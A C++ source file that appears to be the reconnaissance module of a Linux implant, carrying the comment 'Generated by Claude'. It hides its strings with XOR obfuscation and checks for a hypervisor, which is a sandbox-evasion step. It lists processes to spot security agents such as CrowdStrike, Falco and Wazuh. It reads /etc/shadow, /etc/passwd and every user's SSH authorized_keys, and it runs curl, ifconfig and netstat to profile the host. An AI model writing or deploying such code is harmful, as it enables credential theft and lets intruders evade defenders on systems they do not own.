#include "recon.h"
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <net/if.h>
#include <dirent.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <cstring>
#include <sstream>
#include <vector>
#include <fstream>
#include <memory>
#include <array>
#include <cstdio>

/* Generated by Claude */
template <size_t N>
struct ObfuscatedString {
    std::array<char, N> data;
    char key;
    
    consteval ObfuscatedString(const char (&str)[N], char k) : data{}, key(k) {
        for (size_t i = 0; i < N; ++i) {
            data[i] = str[i] ^ k;
        }
    }
    
    std::string decrypt() const {
        std::string result(N - 1, '\0');  // exclude null terminator
        for (size_t i = 0; i < N - 1; ++i) {
            result[i] = data[i] ^ key;
        }
        return result;
    }
};

#define OBFUSCATE(str) ObfuscatedString<sizeof(str)>(str, 0x5A)

// ============================================================================
// MINIMAL DEPENDENCY HELPERS
// ============================================================================

static int str_copy(char* dst, const char* src, int max_len) {
    int i = 0;
    while (i < max_len - 1 && src[i]) {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}

static int hex_to_str(unsigned char value, char* buf) {
    const char hex[] = "0123456789abcdef";
    buf[0] = hex[(value >> 4) & 0xF];
    buf[1] = hex[value & 0xF];
    return 2;
}

static bool is_numeric(const char* str) {
    if (!str || !str[0]) return false;
    for (int i = 0; str[i]; i++) {
        if (str[i] < '0' || str[i] > '9') return false;
    }
    return true;
}

std::string exec_helper(const char* cmd) {
    std::array<char, 128> buffer;
    std::string r;
    std::unique_ptr<FILE, decltype(&pclose)> pipe(popen(cmd, "r"), pclose);
    if(!pipe) { return OBFUSCATE("ERR, pipe failed").decrypt(); }
    while(fgets(buffer.data(), buffer.size(), pipe.get()) != nullptr) {
        r += buffer.data();
    }
    return r;
}

// ============================================================================
// HYPERVISOR DETECTION via CPUID
// ============================================================================

struct HypervisorInfo {
    bool present;
    char signature[13];
};

static HypervisorInfo detect_hypervisor_cpuid() {
    HypervisorInfo info = {false, {0}};
    
    #if defined(__x86_64__) || defined(__i386__)
    unsigned int eax, ebx, ecx, edx;
    
    eax = 1;
    __asm__ __volatile__(
        "cpuid"
        : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx)
        : "a"(eax)
    );
    
    if (ecx & (1u << 31)) {
        info.present = true;
        
        eax = 0x40000000;
        __asm__ __volatile__(
            "cpuid"
            : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx)
            : "a"(eax)
        );
        
        *((unsigned int*)&info.signature[0]) = ebx;
        *((unsigned int*)&info.signature[4]) = ecx;
        *((unsigned int*)&info.signature[8]) = edx;
        info.signature[12] = '\0';
    }
    #endif
    
    return info;
}

// ============================================================================
// PROCESS ENUMERATION via getdents64
// ============================================================================

struct linux_dirent64 {
    unsigned long  d_ino;
    unsigned long  d_off;
    unsigned short d_reclen;
    unsigned char  d_type;
    char           d_name[];
};

struct ProcessEntry {
    int pid;
    char comm[64];
    unsigned int uid;
};

static std::vector<ProcessEntry> enumerate_processes_full() {
    std::vector<ProcessEntry> processes;
    char buf[4096];
    
    int proc_fd = syscall(SYS_open, "/proc", O_RDONLY | O_DIRECTORY);
    if (proc_fd < 0) return processes;
    
    while (processes.size() < 512) {
        long nread = syscall(SYS_getdents64, proc_fd, buf, sizeof(buf));
        if (nread <= 0) break;
        
        for (long pos = 0; pos < nread;) {
            struct linux_dirent64* d = (struct linux_dirent64*)(buf + pos);
            
            if (d->d_type == DT_DIR && is_numeric(d->d_name)) {
                ProcessEntry entry = {0};
                
                for (int i = 0; d->d_name[i]; i++) {
                    entry.pid = entry.pid * 10 + (d->d_name[i] - '0');
                }
                
                char comm_path[64] = "/proc/";
                int path_len = 6;
                for (int i = 0; d->d_name[i]; i++) 
                    comm_path[path_len++] = d->d_name[i];
                str_copy(comm_path + path_len, "/comm", 64 - path_len);
                
                int comm_fd = syscall(SYS_open, comm_path, O_RDONLY);
                if (comm_fd >= 0) {
                    char comm_buf[64];
                    long bytes = syscall(SYS_read, comm_fd, comm_buf, sizeof(comm_buf) - 1);
                    if (bytes > 0) {
                        comm_buf[bytes] = '\0';
                        for (int i = 0; i < bytes; i++) {
                            if (comm_buf[i] == '\n') comm_buf[i] = '\0';
                        }
                        str_copy(entry.comm, comm_buf, 64);
                        
                        char status_path[64];
                        str_copy(status_path, "/proc/", 64);
                        path_len = 6;
                        for (int i = 0; d->d_name[i]; i++) 
                            status_path[path_len++] = d->d_name[i];
                        str_copy(status_path + path_len, "/status", 64 - path_len);
                        
                        int status_fd = syscall(SYS_open, status_path, O_RDONLY);
                        if (status_fd >= 0) {
                            char status_buf[1024];
                            bytes = syscall(SYS_read, status_fd, status_buf, sizeof(status_buf) - 1);
                            if (bytes > 0) {
                                status_buf[bytes] = '\0';
                                char* uid_line = strstr(status_buf, "Uid:");
                                if (uid_line) {
                                    uid_line += 4;
                                    while (*uid_line == '\t' || *uid_line == ' ') uid_line++;
                                    entry.uid = atoi(uid_line);
                                }
                            }
                            syscall(SYS_close, status_fd);
                        }
                        
                        processes.push_back(entry);
                    }
                    syscall(SYS_close, comm_fd);
                }
            }
            
            pos += d->d_reclen;
        }
    }
    
    syscall(SYS_close, proc_fd);
    return processes;
}

// ============================================================================
// NETWORK INTERFACE ENUMERATION via ioctl
// ============================================================================

struct NetworkInterface {
    char name[16];
    char mac[18];
    char ip[46];
};

static std::vector<NetworkInterface> enumerate_network_interfaces() {
    std::vector<NetworkInterface> interfaces;
    
    const char* if_names[] = {"lo", "eth0", "eth1", "wlan0", "ens33", "enp0s3", nullptr};
    
    int sock = syscall(SYS_socket, AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) return interfaces;
    
    for (int i = 0; if_names[i]; i++) {
        struct ifreq ifr;
        memset(&ifr, 0, sizeof(ifr));
        str_copy(ifr.ifr_name, if_names[i], IFNAMSIZ);
        
        if (syscall(SYS_ioctl, sock, SIOCGIFFLAGS, &ifr) < 0) {
            continue;
        }
        
        NetworkInterface iface = {0};
        str_copy(iface.name, if_names[i], 16);
        
        if (syscall(SYS_ioctl, sock, SIOCGIFHWADDR, &ifr) == 0) {
            unsigned char* m = (unsigned char*)ifr.ifr_hwaddr.sa_data;
            int pos = 0;
            for (int j = 0; j < 6; j++) {
                pos += hex_to_str(m[j], iface.mac + pos);
                if (j < 5) iface.mac[pos++] = ':';
            }
            iface.mac[pos] = '\0';
        }
        
        if (syscall(SYS_ioctl, sock, SIOCGIFADDR, &ifr) == 0) {
            struct sockaddr_in* addr = (struct sockaddr_in*)&ifr.ifr_addr;
            inet_ntop(AF_INET, &addr->sin_addr, iface.ip, 46);
        }
        
        interfaces.push_back(iface);
    }
    
    syscall(SYS_close, sock);
    return interfaces;
}

// ============================================================================
// SECURITY PRODUCT DETECTION
// ============================================================================

static std::string detect_security_products(const std::vector<ProcessEntry>& processes) {
    const char* security_procs[] = {
        "ossec", "falco", "auditd", "crowdstrike", "falcon-sensor",
        "cb-agent", "sentinelagent", "wazuh", "osquery", nullptr
    };
    
    std::ostringstream detected;
    bool first = true;
    
    for (const auto& proc : processes) {
        for (int i = 0; security_procs[i]; i++) {
            if (strstr(proc.comm, security_procs[i])) {
                if (!first) detected << ",";
                detected << security_procs[i];
                first = false;
                break;
            }
        }
    }
    
    return detected.str();
}

// ============================================================================
// ADDITIONAL FILE / DIRECTORY COLLECTION
// ============================================================================

static std::string read_file_safe(const std::string& path) {
    std::ifstream f(path);
    if (!f.is_open()) return "[!] Could not read " + path + "\n";
    std::ostringstream ss;
    ss << f.rdbuf();
    return ss.str();
}

static std::string exec_recon(const std::string& cmd) {
    std::array<char, 128> buffer;
    std::string result;
    std::unique_ptr<FILE, decltype(&pclose)> pipe(popen(cmd.c_str(), "r"), pclose);
    if (!pipe) return "";
    while (fgets(buffer.data(), buffer.size(), pipe.get()) != nullptr) {
        result += buffer.data();
    }
    return result;
}

static std::string list_dir(const std::string& dir) {
    return exec_recon("ls -la " + dir + " 2>/dev/null");
}

static std::string collect_home_and_keys() {
    std::ostringstream out;
    out << "\n=== SENSITIVE FILES ===\n";

    out << "\n--- /etc/passwd ---\n";
    out << read_file_safe("/etc/passwd");

    out << "\n--- /etc/shadow ---\n";
    out << read_file_safe("/etc/shadow");

    out << "\n--- /etc/hosts ---\n";
    out << read_file_safe("/etc/hosts");

    out << "\n--- /etc/crontab ---\n";
    out << read_file_safe("/etc/crontab");

    out << "\n--- /home directory listing ---\n";
    out << list_dir("/home");

    // SSH keys
    out << "\n--- SSH Authorized Keys ---\n";
    std::vector<std::string> home_dirs;
    {
        DIR* d = opendir("/home");
        if (d) {
            struct dirent* entry;
            while ((entry = readdir(d)) != nullptr) {
                if (entry->d_type == DT_DIR && entry->d_name[0] != '.') {
                    home_dirs.push_back(OBFUSCATE("/home/").decrypt() + entry->d_name);
                }
            }
            closedir(d);
        }
    }
    home_dirs.push_back(OBFUSCATE("/root").decrypt());

    for (const auto& dir : home_dirs) {
        std::string key_path = dir + OBFUSCATE("/.ssh/authorized_keys").decrypt();
        std::ifstream f(key_path);
        if (f.good()) {
            out << "\n" << key_path << ":\n";
            out << f.rdbuf();
            out << "\n";
        }
    }

    out << "\n--- /etc/issue (OS info) ---\n";
    out << read_file_safe("/etc/issue");
    out << "\n--- /etc/fstab ---\n";
    out << read_file_safe("/etc/fstab");

    return out.str();
}

// ============================================================================
// MAIN RECONNAISSANCE FUNCTION
// ============================================================================

std::string perform_full_recon() {
    std::ostringstream output;
    
    struct utsname uts;
    char hostname[64] = "unknown";
    char kernel[256] = "unknown";   // enlarged to avoid warning

    if (syscall(SYS_uname, &uts) == 0) {
        snprintf(kernel, sizeof(kernel), "%s %s", uts.sysname, uts.release);
        str_copy(hostname, uts.nodename, 64);
    }
    
    unsigned int uid = syscall(SYS_getuid);
    unsigned int gid = syscall(SYS_getgid);
    bool is_root = (uid == 0);
    
    HypervisorInfo hv = detect_hypervisor_cpuid();
    std::vector<ProcessEntry> processes = enumerate_processes_full();
    std::vector<NetworkInterface> interfaces = enumerate_network_interfaces();
    std::string sec_products = detect_security_products(processes);
    
    output << "=== SYSTEM RECONNAISSANCE ===\n";
    output << "Hostname: " << hostname << "\n";
    output << "Kernel: " << kernel << "\n";
    output << "UID: " << uid << " | GID: " << gid << " | Root: " << (is_root ? "YES" : "NO") << "\n";
    output << "Virtualization: " << (hv.present ? hv.signature : "PHYSICAL") << "\n";
    output << "Security Products: " << (sec_products.empty() ? "None detected" : sec_products) << "\n";
    
    output << "\n--- NETWORK INTERFACES ---\n";
    for (const auto& iface : interfaces) {
        output << iface.name << " | MAC: " << iface.mac << " | IP: " << iface.ip << "\n";
    }
    
    output << "\n--- PROCESSES (Top 20) ---\n";
    int count = 0;
    for (const auto& proc : processes) {
        if (count++ >= 20) break;
        output << "PID: " << proc.pid << " | UID: " << proc.uid << " | " << proc.comm << "\n";
    }

    output << collect_home_and_keys();

    output << "\n=== END RECON ===\n";
    return output.str();
}

std::string collect_ip_info() {
    std::ostringstream output;

    std::string o1 = exec_helper(OBFUSCATE("curl ipinfo.io").decrypt().c_str());

    output << OBFUSCATE("=== IP RECONNAISSANCE ===\n").decrypt();
    output << OBFUSCATE("IP based location info: ").decrypt() << o1 << "\n";

    std::string o4 = exec_helper(OBFUSCATE("ifconfig").decrypt().c_str());
    std::string o5 = exec_helper(OBFUSCATE("netstat").decrypt().c_str());

    output << OBFUSCATE("\n--- VPN RECONNAISSANCE ---\n").decrypt();
    output << o4 << "\n";
    output << o5 << "\n";

    output << OBFUSCATE("\n=== END RECON ===\n").decrypt();
    return output.str();
}
